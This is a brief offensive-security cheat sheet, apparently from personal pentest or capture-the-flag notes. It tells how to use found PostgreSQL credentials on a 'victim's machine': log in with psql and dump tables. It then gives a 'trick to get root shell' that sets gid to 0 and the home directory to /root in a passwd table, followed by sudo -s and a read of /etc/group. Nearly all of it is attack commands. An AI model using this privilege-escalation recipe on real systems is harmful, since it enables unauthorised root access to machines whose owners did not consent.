Postgress creds found?

On the victim's machine, run

psql -d unix(database-name) UserNAME -h localhost

Run,\dt to show tables.


:select * from table_name;


Trick to get root shell:

update passwd_table set gid=0 where gid=1000;

update passwd_table set homedir='/root' where homedir='/var/jail/home';

Then run sudo -s to impersonate as a root account

cat /etc/group | grep sudo to verify the gid!

Last updated